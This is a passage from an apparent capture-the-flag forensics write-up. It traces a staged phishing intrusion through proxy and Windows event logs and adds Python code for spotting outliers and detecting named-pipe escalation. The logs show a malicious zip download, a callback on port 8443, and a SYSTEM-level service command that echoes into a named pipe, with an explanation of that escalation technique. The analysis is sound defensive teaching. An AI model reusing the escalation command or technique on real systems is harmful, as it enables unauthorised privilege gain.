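def outliers(records, fields=("ReceivedIP1", "ReceivedIP2"), min_share=0.9):
    """(sender, reason) for every record where a relay field is external, or
    deviates from a baseline that at least `min_share` of records agree on."""
    flagged = []
    for field in fields:
        common, share = baseline(records, field)
        for r in records:
            value = r.get(field)
            if is_external(value):
                flagged.append((r["From"], f"{field}={value} is external"))
            elif share >= min_share and value != common:
                flagged.append((r["From"], f"{field}={value} differs from baseline {common}"))
    return flagged


if __name__ == "__main__":
    for sender, reason in outliers(MAIL):
        print(sender, "->", reason)
```

Against the real 1,398 records the baseline share for ReceivedIP2 is above 99.9%, so the external-address rule and the deviation rule both fire on the same single event; with only four constructed records the share is 75%, which is why only the external-address rule fires here.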

Question 5

Our ElfSOC analysts need your help identifying the hostname of the domain computer that established a connection to the attacker after receiving the phishing email from the previous question. You can take a look at our GreenCoat proxy logs as an event source. Since it is a domain computer, we only need the hostname, not the fully qualified domain name (FQDN) of the system.

Interestingly, the email looks very much like a phishing email:

image-20241228145218900

I want to know what computer clicked on the link, so I’ll filter to get the GreenCoat logs as well as a url field containing the malicious domain: event_source: "GreenCoat" and event.url: *holly*. This returns one result:

image-20241228145738232

In jq, the contains filter will help select url fields with “holly”:

oxdf@hacky$ cat GreenCoat.log | cut -d' ' -f8- | jq -r '. | select(.url | contains("holly")) | .host'
SleighRider

Answer: SleighRider

Questions 6-10

Question 6

What was the IP address of the system you found in the previous question?

Looking at the same log, the event.ip value is 172.24.25.12. From command line, it’s:

oxdf@hacky$ cat GreenCoat.log | cut -d' ' -f8- | jq -r '. | select(.url | contains("holly")) | .ip'
172.24.25.12

Answer: 172.24.25.12

Question 7

A process was launched when the user executed the program AFTER they downloaded it. What was that Process ID number (digits only please)?

The GreenCoat logs show the link was clicked at 10:36:26 on Sep 15, 2024. I’ll filter to get process creation events on that computer: event_source: "WindowsEvent" and event.EventID: 1 and hostname: SleighRider* .

At 10:36:36, there’s a log showing Chrome downloading the zip archive:

image-20241228150246860

Strangely, there are two ProcessID fields (as discussed above):

image-20241228151406414

It’s a bit cleaner to see the logs just after the download:

oxdf@hacky$ cat WindowsEvent.log | grep "Process Create:" | cut -d' ' -f8- | jq -r '. | select(.EventID == 1 and .Hostname == "SleighRider.northpole.local" and .EventTime > "2024-09-15 10:36:26") | "[\(.EventTime): \(.ProcessID) \(.ProcessId) \(.ParentProcessId)] \(.CommandLine)"' 
[2024-09-15 10:36:36: 10014 5272 1496] "C:\Program Files\Google\Chrome\Application\chrome.exe" --single-argument http://hollyhaven.snowflake/howtosavexmas.zip
[2024-09-15 10:37:02: 10014 2972 772] "C:\Windows\SysWOW64\DllHost.exe" /Processid:{776DBC8D-7347-478C-8D71-791E12EF49D8}
[2024-09-15 10:37:13: 10014 3572 772] "C:\Windows\SysWOW64\DllHost.exe" /Processid:{776DBC8D-7347-478C-8D71-791E12EF49D8}
[2024-09-15 10:37:20: 10014 8848 8524] consent.exe 8524 558 000001B2CD232F70
[2024-09-15 10:37:50: 10014 8096 5680] "C:\Users\elf_user02\Downloads\howtosavexmas\howtosavexmas.pdf.exe" 
[2024-09-15 10:38:22: 10014 6484 628] cmd.exe /c echo ddpvccdbr > \\.\pipe\ddpvccdbr
[2024-09-15 10:38:34: 10014 4336 8096] powershell.exe
[2024-09-15 10:42:00: 10014 9012 628] C:\Windows\system32\svchost.exe -k netsvcs -s LxpSvc
[2024-09-15 10:42:00: 10014 9840 628] C:\Windows\servicing\TrustedInstaller.exe
[2024-09-15 10:42:00: 10014 10220 772] C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4163_none_7e304ec47c735f2e\TiWorker.exe -Embedding
[2024-09-15 10:42:37: 10014 9848 1256] taskhostw.exe -RegisterDevice -ProtectionStateChanged -FreeNetworkOnly
[2024-09-15 10:42:37: 10014 532 772] C:\Windows\System32\smartscreen.exe -Embedding
[2024-09-15 10:43:33: 10014 9292 1256] "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ua /installsource scheduler
[2024-09-15 10:44:09: 10014 8220 608] powershell.exe
[2024-09-15 10:44:15: 10014 2932 8220] "C:\Windows\system32\ipconfig.exe"
[2024-09-15 10:44:33: 10014 9240 1256] "gpupdate.exe" /target:computer
[2024-09-15 10:45:37: 10014 5748 772] C:\Windows\System32\mousocoreworker.exe -Embedding
[2024-09-15 10:45:37: 10014 1108 628] C:\Windows\servicing\TrustedInstaller.exe
[2024-09-15 10:45:37: 10014 7004 772] C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4163_none_7e304ec47c735f2e\TiWorker.exe -Embedding
[2024-09-15 10:46:27: 10014 4412 8024] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5068,i,6610646538386684154,15194029041574557616,262144 --variations-seed-version --mojo-platform-channel-handle=4992 /prefetch:8
[2024-09-15 10:46:33: 10014 8064 8024] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5032,i,6610646538386684154,15194029041574557616,262144 --variations-seed-version --mojo-platform-channel-handle=4868 /prefetch:8
[2024-09-15 10:49:40: 10014 8364 1256] "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ua /installsource scheduler
[2024-09-15 10:50:02: 10014 836 1256] "gpupdate.exe" /target:user
[2024-09-15 10:50:02: 10014 8240 628] C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
[2024-09-16 11:00:21: 10014 9896 628] C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
[2024-09-16 11:04:24: 10014 9284 8024] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5036,i,6610646538386684154,15194029041574557616,262144 --variations-seed-version --mojo-platform-channel-handle=4860 /prefetch:8
[2024-09-16 11:15:21: 10014 7752 628] C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
[2024-09-16 11:27:22: 10014 7936 628] C:\Windows\ZiyfDiiO.exe
[2024-09-16 11:27:22: 10014 532 7936] powershell.exe
[2024-09-16 11:27:36: 10014 2280 532] "C:\Windows\system32\whoami.exe"
[2024-09-16 11:28:16: 10014 9844 628] C:\Windows\YdTRctss.exe
[2024-09-16 11:28:16: 10014 928 7936] powershell.exe
[2024-09-16 11:30:21: 10014 6304 628] C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
[2024-09-16 11:43:32: 10014 9752 1256] "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ua /installsource scheduler
[2024-09-16 11:45:21: 10014 7668 628] C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
[2024-09-16 11:45:38: 10014 3940 772] C:\Windows\System32\mousocoreworker.exe -Embedding
[2024-09-16 11:49:40: 10014 8780 1256] "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ua /installsource scheduler

74 seconds after Chrome downloads the zip archive, there’s a howtosavexmas.pdf.exe process, followed by other suspicious activity. All these processes (as well as every one on this host, as discussed above) have a ProcessID of 10014, which is the accepted answer. That is because in these NXLog records the capital-D ProcessID comes from the event header and is the PID of the Sysmon service that wrote the event, while the lowercase ProcessId in the event data is the process that was actually created (8096 for howtosavexmas.pdf.exe).

Answer: 10014

Question 8

Did the attacker’s payload make an outbound network connection? Our ElfSOC analysts need your help identifying the destination TCP port of this connection.

Sysmon ID 3 is Network connection detected. I’ll filter to get these events for the process ID identified above:

event_source: "WindowsEvent" and event.EventID: 3 and event.ProcessID: 10014

There are some events before the time of interest, but then at 10:37:51 there’s this:

image-20241228153721299

From the command line, some jq foo makes this pretty easy:

oxdf@hacky$ cat WindowsEvent.log | grep "Network connection detected" | cut -d' ' -f8- | jq -r '. | select(.EventID == 3 and .ProcessID == 10014 and .EventTime > "2024-09-15 10:36:26") | "[\(.EventTime)] \(.Image) \(.DestinationHostname):\(.DestinationPort)"' 
[2024-09-15 10:37:51] C:\Users\elf_user02\Downloads\howtosavexmas\howtosavexmas.pdf.exe 19.148.239.35.bc.googleusercontent.com:8443
[2024-09-16 11:28:02] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe DC01:389
[2024-09-16 11:28:02] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe DC01:389
[2024-09-16 11:28:02] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe DC01:389
[2024-09-16 11:28:03] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe DC01:389
[2024-09-16 11:28:45] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe DC01:389
[2024-09-16 11:28:47] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe DC01:389
[2024-09-16 11:28:48] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe DC01:389
[2024-09-16 11:28:49] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe DC01:389
[2024-09-16 11:28:50] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe DC01:389
[2024-09-16 11:30:20] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe DC01:389
[2024-09-16 11:33:03] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe DC01:389

Answer: 8443

Question 9

The attacker escalated their privileges to the SYSTEM account by creating an inter-process communication (IPC) channel. Submit the alpha-numeric name for the IPC channel used by the attacker.

A pipe seems like the likely culprit, but searching the Sysmon Pipe Created events (ID 17) turns up nothing interesting near the timeframe, so Sysmon’s pipe logging isn’t going to answer this directly.

I’ll get all the logs from the suspect host:

oxdf@hacky$ cat WindowsEvent.log | cut -d' ' -f8- | jq -rc '. | select(.Hostname == "SleighRider.northpole.local")' > WindowsEvent-SleighRider.log

Searching for IPC doesn’t turn up anything, but “pipe” does:

oxdf@hacky$ cat WindowsEvent-SleighRider.log | grep -i PIPE
{"EventTime":"2024-09-15 10:38:22","Hostname":"SleighRider.northpole.local","Keywords":-9187343239835812000,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7045,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":1571,"ProcessID":628,"ThreadID":5852,"Channel":"System","Domain":"NORTHPOLE","AccountName":"elf_user02","UserID":"S-1-5-21-3699322559-1991583901-1175093138-1110","AccountType":"User","ServiceName":"ddpvccdbr","ImagePath":"cmd.exe /c echo ddpvccdbr &gt; \\\\.\\pipe\\ddpvccdbr","ServiceType":"user mode service","StartType":"demand start","EventReceivedTime":"2024-09-15T10:38:22-04:00","SourceModuleName":"inSystemEvent","SourceModuleType":"im_msvistalog","ServiceFileName":"cmd.exe /c echo ddpvccdbr > \\\\.\\pipe\\ddpvccdbr","ServiceStartType":"demand start","ServiceAccount":"LocalSystem","MoreDetails":"A service was installed in the system."}
{"EventTime":"2024-09-15 10:38:22","Hostname":"SleighRider.northpole.local","Keywords":-9223372036854776000,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":731,"ProcessID":10014,"ThreadID":6340,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"T1031,T1050","UtcTime":"2024-09-15T10:38:22-04:00","ProcessGuid":"{face0b26-e125-6606-0b00-000000000700}","Image":"C:\\Windows\\system32\\services.exe","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\ddpvccdbr\\ImagePath","Details":"cmd.exe /c echo ddpvccdbr &gt; \\\\.\\pipe\\ddpvccdbr","User":"NT AUTHORITY\\SYSTEM","EventReceivedTime":"2024-09-15T10:38:22-04:00","SourceModuleName":"inSysmon","SourceModuleType":"im_msvistalog","ProcessId":628,"MoreDetails":"Registry value set:"}
{"EventTime":"2024-09-15 10:38:22","Hostname":"SleighRider.northpole.local","Keywords":-9223372036854776000,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":732,"ProcessID":10014,"ThreadID":6340,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","RuleName":"-","UtcTime":"2024-09-15T10:38:22-04:00","ProcessGuid":"{face0b26-428e-660c-f10f-000000000700}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.19041.3636 (WinBuild.160101.0800)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"cmd.exe /c echo ddpvccdbr &gt; \\\\.\\pipe\\ddpvccdbr","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{face0b26-e125-6606-e703-000000000000}","LogonId":"0x3e7","TerminalSessionId":0,"IntegrityLevel":"System","Hashes":"MD5=CB6CD09F6A25744A8FA6E4B3E4D260C5,SHA256=265B69033CEA7A9F8214A34CD9B17912909AF46C7A47395DD7BB893A24507E59,IMPHASH=272245E2988E1E430500B852C4FB5E18","ParentProcessGuid":"{face0b26-e125-6606-0b00-000000000700}","ParentProcessId":628,"ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","ParentUser":"NT AUTHORITY\\SYSTEM","EventReceivedTime":"2024-09-15T10:38:22-04:00","SourceModuleName":"inSysmon","SourceModuleType":"im_msvistalog","ProcessId":6484,"MoreDetails":"Process Create:"}
{"EventTime":"2024-09-15 10:38:22","Hostname":"SleighRider.northpole.local","Keywords":-9214364837600035000,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4697,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":1,"Task":12289,"OpcodeValue":0,"RecordNumber":736050,"ActivityID":"{89CD0D3E-81EF-0000-6C0E-CD89EF81DA01}","ProcessID":668,"ThreadID":716,"Channel":"Security","Category":"Security System Extension","Opcode":"Info","SubjectUserSid":"S-1-5-21-3699322559-1991583901-1175093138-1110","SubjectUserName":"elf_user02","SubjectDomainName":"NORTHPOLE","SubjectLogonId":"0x57d0f65","ServiceName":"ddpvccdbr","ServiceFileName":"cmd.exe /c echo ddpvccdbr &gt; \\\\.\\pipe\\ddpvccdbr","ServiceType":"0x10","ServiceStartType":3,"ServiceAccount":"LocalSystem","ClientProcessStartKey":1970324836978667,"ClientProcessId":8096,"ParentProcessId":5680,"EventReceivedTime":"2024-09-15T10:38:22-04:00","SourceModuleName":"inSecurityEvent","SourceModuleType":"im_msvistalog","Subject_SecurityID":"S-1-5-21-3699322559-1991583901-1175093138-1110","Subject_AccountName":"elf_user02","Subject_AccountDomain":"NORTHPOLE","Subject_LogonID":"0x57D0F65","ServiceInformation_ServiceName":"ddpvccdbr","ServiceInformation_ServiceFileName":"cmd.exe /c echo ddpvccdbr > \\\\.\\pipe\\ddpvccdbr","ServiceInformation_ServiceType":"0x10","ServiceInformation_ServiceStartType":3,"ServiceInformation_ServiceAccount":"LocalSystem","MoreDetails":"A service was installed in the system."}
...[snip]...

The first four logs show suspicious activity with a named pipe. I’ll save them to a file and then look at the event IDs:

oxdf@hacky$ cat pipe_event.log | jq '.EventID'
7045
13
1
4697

The first is System event 7045, a new service installed on the system:

oxdf@hacky$ cat pipe_event.log | head -1 | jq .
{
  "EventTime": "2024-09-15 10:38:22",
  "Hostname": "SleighRider.northpole.local",
  "Keywords": -9187343239835812000,
  "EventType": "INFO",
  "SeverityValue": 2,
  "Severity": "INFO",
  "EventID": 7045,
  "SourceName": "Service Control Manager",
  "ProviderGuid": "{555908D1-A6D7-4695-8E1E-26931D2012F4}",
  "Version": 0,
  "Task": 0,
  "OpcodeValue": 0,
  "RecordNumber": 1571,
  "ProcessID": 628,
  "ThreadID": 5852,
  "Channel": "System",
  "Domain": "NORTHPOLE",
  "AccountName": "elf_user02",
  "UserID": "S-1-5-21-3699322559-1991583901-1175093138-1110",
  "AccountType": "User",
  "ServiceName": "ddpvccdbr",
  "ImagePath": "cmd.exe /c echo ddpvccdbr &gt; \\\\.\\pipe\\ddpvccdbr",
  "ServiceType": "user mode service",
  "StartType": "demand start",
  "EventReceivedTime": "2024-09-15T10:38:22-04:00",
  "SourceModuleName": "inSystemEvent",
  "SourceModuleType": "im_msvistalog",
  "ServiceFileName": "cmd.exe /c echo ddpvccdbr > \\\\.\\pipe\\ddpvccdbr",
  "ServiceStartType": "demand start",
  "ServiceAccount": "LocalSystem",
  "MoreDetails": "A service was installed in the system."
}

The next is the Sysmon registry write (event 13) that comes with that installation, services.exe setting the ImagePath under HKLM\System\CurrentControlSet\Services\ddpvccdbr:

oxdf@hacky$ cat pipe_event.log | head -2 | tail -1 | jq .
{
  "EventTime": "2024-09-15 10:38:22",
  "Hostname": "SleighRider.northpole.local",
  "Keywords": -9223372036854776000,
  "EventType": "INFO",
  "SeverityValue": 2,
  "Severity": "INFO",
  "EventID": 13,
  "SourceName": "Microsoft-Windows-Sysmon",
  "ProviderGuid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}",
  "Version": 2,
  "Task": 13,
  "OpcodeValue": 0,
  "RecordNumber": 731,
  "ProcessID": 10014,
  "ThreadID": 6340,
  "Channel": "Microsoft-Windows-Sysmon/Operational",
  "Domain": "NT AUTHORITY",
  "AccountName": "SYSTEM",
  "UserID": "S-1-5-18",
  "AccountType": "User",
  "Category": "Registry value set (rule: RegistryEvent)",
  "Opcode": "Info",
  "RuleName": "T1031,T1050",
  "UtcTime": "2024-09-15T10:38:22-04:00",
  "ProcessGuid": "{face0b26-e125-6606-0b00-000000000700}",
  "Image": "C:\\Windows\\system32\\services.exe",
  "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\ddpvccdbr\\ImagePath",
  "Details": "cmd.exe /c echo ddpvccdbr &gt; \\\\.\\pipe\\ddpvccdbr",
  "User": "NT AUTHORITY\\SYSTEM",
  "EventReceivedTime": "2024-09-15T10:38:22-04:00",
  "SourceModuleName": "inSysmon",
  "SourceModuleType": "im_msvistalog",
  "ProcessId": 628,
  "MoreDetails": "Registry value set:"
}

Then there’s the Sysmon process creation (event 1) for the service binary itself: cmd.exe spawned by services.exe as NT AUTHORITY\SYSTEM, echoing into the named pipe:

oxdf@hacky$ cat pipe_event.log | head -3 | tail -1 | jq .
{
  "EventTime": "2024-09-15 10:38:22",
  "Hostname": "SleighRider.northpole.local",
  "Keywords": -9223372036854776000,
  "EventType": "INFO",
  "SeverityValue": 2,
  "Severity": "INFO",
  "EventID": 1,
  "SourceName": "Microsoft-Windows-Sysmon",
  "ProviderGuid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}",
  "Version": 5,
  "Task": 1,
  "OpcodeValue": 0,
  "RecordNumber": 732,
  "ProcessID": 10014,
  "ThreadID": 6340,
  "Channel": "Microsoft-Windows-Sysmon/Operational",
  "Domain": "NT AUTHORITY",
  "AccountName": "SYSTEM",
  "UserID": "S-1-5-18",
  "AccountType": "User",
  "Category": "Process Create (rule: ProcessCreate)",
  "Opcode": "Info",
  "RuleName": "-",
  "UtcTime": "2024-09-15T10:38:22-04:00",
  "ProcessGuid": "{face0b26-428e-660c-f10f-000000000700}",
  "Image": "C:\\Windows\\System32\\cmd.exe",
  "FileVersion": "10.0.19041.3636 (WinBuild.160101.0800)",
  "Description": "Windows Command Processor",
  "Product": "Microsoft® Windows® Operating System",
  "Company": "Microsoft Corporation",
  "OriginalFileName": "Cmd.Exe",
  "CommandLine": "cmd.exe /c echo ddpvccdbr &gt; \\\\.\\pipe\\ddpvccdbr",
  "CurrentDirectory": "C:\\Windows\\system32\\",
  "User": "NT AUTHORITY\\SYSTEM",
  "LogonGuid": "{face0b26-e125-6606-e703-000000000000}",
  "LogonId": "0x3e7",
  "TerminalSessionId": 0,
  "IntegrityLevel": "System",
  "Hashes": "MD5=CB6CD09F6A25744A8FA6E4B3E4D260C5,SHA256=265B69033CEA7A9F8214A34CD9B17912909AF46C7A47395DD7BB893A24507E59,IMPHASH=272245E2988E1E430500B852C4FB5E18",
  "ParentProcessGuid": "{face0b26-e125-6606-0b00-000000000700}",
  "ParentProcessId": 628,
  "ParentImage": "C:\\Windows\\System32\\services.exe",
  "ParentCommandLine": "C:\\Windows\\system32\\services.exe",
  "ParentUser": "NT AUTHORITY\\SYSTEM",
  "EventReceivedTime": "2024-09-15T10:38:22-04:00",
  "SourceModuleName": "inSysmon",
  "SourceModuleType": "im_msvistalog",
  "ProcessId": 6484,
  "MoreDetails": "Process Create:"
}

The last is Security event 4697 for the new service, which also records the requesting user (elf_user02) and the client process (ClientProcessId 8096 with parent 5680, the howtosavexmas.pdf.exe process):

oxdf@hacky$ cat pipe_event.log | tail -1 | jq .
{
  "EventTime": "2024-09-15 10:38:22",
  "Hostname": "SleighRider.northpole.local",
  "Keywords": -9214364837600035000,
  "EventType": "AUDIT_SUCCESS",
  "SeverityValue": 2,
  "Severity": "INFO",
  "EventID": 4697,
  "SourceName": "Microsoft-Windows-Security-Auditing",
  "ProviderGuid": "{54849625-5478-4994-A5BA-3E3B0328C30D}",
  "Version": 1,
  "Task": 12289,
  "OpcodeValue": 0,
  "RecordNumber": 736050,
  "ActivityID": "{89CD0D3E-81EF-0000-6C0E-CD89EF81DA01}",
  "ProcessID": 668,
  "ThreadID": 716,
  "Channel": "Security",
  "Category": "Security System Extension",
  "Opcode": "Info",
  "SubjectUserSid": "S-1-5-21-3699322559-1991583901-1175093138-1110",
  "SubjectUserName": "elf_user02",
  "SubjectDomainName": "NORTHPOLE",
  "SubjectLogonId": "0x57d0f65",
  "ServiceName": "ddpvccdbr",
  "ServiceFileName": "cmd.exe /c echo ddpvccdbr &gt; \\\\.\\pipe\\ddpvccdbr",
  "ServiceType": "0x10",
  "ServiceStartType": 3,
  "ServiceAccount": "LocalSystem",
  "ClientProcessStartKey": 1970324836978667,
  "ClientProcessId": 8096,
  "ParentProcessId": 5680,
  "EventReceivedTime": "2024-09-15T10:38:22-04:00",
  "SourceModuleName": "inSecurityEvent",
  "SourceModuleType": "im_msvistalog",
  "Subject_SecurityID": "S-1-5-21-3699322559-1991583901-1175093138-1110",
  "Subject_AccountName": "elf_user02",
  "Subject_AccountDomain": "NORTHPOLE",
  "Subject_LogonID": "0x57D0F65",
  "ServiceInformation_ServiceName": "ddpvccdbr",
  "ServiceInformation_ServiceFileName": "cmd.exe /c echo ddpvccdbr > \\\\.\\pipe\\ddpvccdbr",
  "ServiceInformation_ServiceType": "0x10",
  "ServiceInformation_ServiceStartType": 3,
  "ServiceInformation_ServiceAccount": "LocalSystem",
  "MoreDetails": "A service was installed in the system."
}

The service name / name of the pipe is the answer: ddpvccdbr. The pattern here, a throwaway service whose command line is cmd.exe /c echo <name> > \\.\pipe\<name> and that runs as LocalSystem, is the classic named-pipe impersonation privilege escalation (what Meterpreter’s getsystem does): the attacker’s process creates and listens on the pipe, the service installed from the user’s context makes a SYSTEM-level cmd.exe connect to it, and the listener impersonates the pipe client to obtain a SYSTEM token. A service whose ImagePath echoes into a pipe, with a random-looking name that matches the service name, is a reliable detection for it.

I could have also noticed the process running just after the howtosavexmas.pdf.exe process:

[2024-09-15 10:37:50: 10014 8096 5680] "C:\Users\elf_user02\Downloads\howtosavexmas\howtosavexmas.pdf.exe" 
[2024-09-15 10:38:22: 10014 6484 628] cmd.exe /c echo ddpvccdbr &gt; \\.\pipe\ddpvccdbr
[2024-09-15 10:38:34: 10014 4336 8096] powershell.exe

That line alone shows the write to the pipe.
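The detection described above, as an added example (not code from the original writeup): it parses NXLog-style JSON records like the ones quoted, unescapes the &gt; that the copied records carry, and flags any service install (7045 / 4697) or process creation (Sysmon 1) whose command line echoes into a named pipe, noting whether the echoed token equals the pipe name and whether it runs as SYSTEM. The sample records are constructed for the example, trimmed to the fields the check needs, with a benign Google Update service install added for contrast.

```python
import html
import json
import re
from typing import Iterable

# Constructed sample records, shaped like the NXLog JSON lines quoted above:
# the three ddpvccdbr records (7045, 4697, Sysmon 1) plus a benign service
# install for contrast. Field set is trimmed to what the detection needs.
SAMPLE_LOG = r'''
{"EventTime":"2024-09-15 10:38:22","Hostname":"SleighRider.northpole.local","EventID":7045,"Channel":"System","ServiceName":"ddpvccdbr","ImagePath":"cmd.exe /c echo ddpvccdbr &gt; \\\\.\\pipe\\ddpvccdbr","ServiceAccount":"LocalSystem","ServiceStartType":"demand start"}
{"EventTime":"2024-09-15 10:38:22","Hostname":"SleighRider.northpole.local","EventID":4697,"Channel":"Security","SubjectUserName":"elf_user02","ServiceName":"ddpvccdbr","ServiceFileName":"cmd.exe /c echo ddpvccdbr > \\\\.\\pipe\\ddpvccdbr","ServiceAccount":"LocalSystem","ClientProcessId":8096}
{"EventTime":"2024-09-15 10:38:22","Hostname":"SleighRider.northpole.local","EventID":1,"Channel":"Microsoft-Windows-Sysmon/Operational","Image":"C:\\Windows\\System32\\cmd.exe","CommandLine":"cmd.exe /c echo ddpvccdbr > \\\\.\\pipe\\ddpvccdbr","ParentImage":"C:\\Windows\\System32\\services.exe","User":"NT AUTHORITY\\SYSTEM","ProcessId":6484,"ParentProcessId":628}
{"EventTime":"2024-09-15 10:43:33","Hostname":"SleighRider.northpole.local","EventID":7045,"Channel":"System","ServiceName":"gupdatem","ImagePath":"\"C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe\" /medsvc","ServiceAccount":"LocalSystem","ServiceStartType":"demand start"}
'''

# cmd.exe /c echo <token> > \\.\pipe\<pipe>  (also bare cmd and %COMSPEC%)
PIPE_ECHO = re.compile(
    r'(?:cmd(?:\.exe)?|%COMSPEC%)\s+/c\s+echo\s+(?P<token>\S+)\s*>\s*'
    r'\\\\\.\\pipe\\(?P<pipe>[^\s"\\]+)',
    re.IGNORECASE,
)


def _command_of(rec: dict) -> str:
    """Whichever field carries the service / process command line in this record."""
    for key in ("ServiceFileName", "ImagePath", "CommandLine"):
        if rec.get(key):
            return html.unescape(rec[key])  # copied records may carry &gt; for >
    return ""


def _as_system(rec: dict) -> bool:
    return rec.get("ServiceAccount") == "LocalSystem" or rec.get("User") == r"NT AUTHORITY\SYSTEM"


def pipe_impersonation_hits(lines: Iterable[str]) -> list[dict]:
    """Flag service installs / process creations whose command echoes into a named pipe."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        rec = json.loads(line)
        m = PIPE_ECHO.search(_command_of(rec))
        if not m:
            continue
        hits.append({
            "time": rec.get("EventTime"),
            "event_id": rec.get("EventID"),
            "pipe": m.group("pipe"),
            # Meterpreter-style installs echo the pipe name into the pipe itself
            "token_is_pipe_name": m.group("token") == m.group("pipe"),
            "service": rec.get("ServiceName"),
            "runs_as_system": _as_system(rec),
            "installed_by": rec.get("SubjectUserName"),
        })
    return hits


def pipe_names(lines: Iterable[str]) -> set[str]:
    """Distinct pipe names seen in impersonation-style commands (the Q9 answer)."""
    return {h["pipe"] for h in pipe_impersonation_hits(lines)}


if __name__ == "__main__":
    for h in pipe_impersonation_hits(SAMPLE_LOG.splitlines()):
        print(h)
```

Run against the full WindowsEvent.log after the cut -d' ' -f8- step, the same three records surface and the benign install does not; the installed_by field on the 4697 record is what ties the SYSTEM-level service back to elf_user02’s session.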

Answer: ddpvccdbr

Question 10

The attacker’s process attempted to access a file. Submit the full and complete file path accessed by the attacker’s process.

howtosavexmas.pdf.exe runs at 10:37:50 (before the privesc) as ProcessID 10014 / ProcessId 8096, and then PowerShell runs as its child at 10:38:34:

oxdf@hacky$ cat WindowsEvent-SleighRider.log | jq -rc '. | select(.EventID == 1 and .Hostname == "SleighRider.northpole.local" and .EventTime > "2024-09-15 10:36:35") | "[\(.EventTime): \(.ProcessId) \(.ParentProcessId)] \(.CommandLine)"'
[2024-09-15 10:36:36: 5272 1496] "C:\Program Files\Google\Chrome\Application\chrome.exe" --single-argument http://hollyhaven.snowflake/howtosavexmas.zip
[2024-09-15 10:37:02: 2972 772] "C:\Windows\SysWOW64\DllHost.exe" /Processid:{776DBC8D-7347-478C-8D71-791E12EF49D8}
[2024-09-15 10:37:13: 3572 772] "C:\Windows\SysWOW64\DllHost.exe" /Processid:{776DBC8D-7347-478C-8D71-791E12EF49D8}
[2024-09-15 10:37:20: 8848 8524] consent.exe 8524 558 000001B2CD232F70
[2024-09-15 10:37:50: 8096 5680] "C:\Users\elf_user02\Downloads\howtosavexmas\howtosavexmas.pdf.exe" 
[2024-09-15 10:38:22: 6484 628] cmd.exe /c echo ddpvccdbr &gt; \\.\pipe\ddpvccdbr
[2024-09-15 10:38:34: 4336 8096] powershell.exe
[2024-09-15 10:42:00: 9012 628] C:\Windows\system32\svchost.exe -k netsvcs -s LxpSvc
[2024-09-15 10:42:00: 9840 628] C:\Windows\servicing\TrustedInstaller.exe
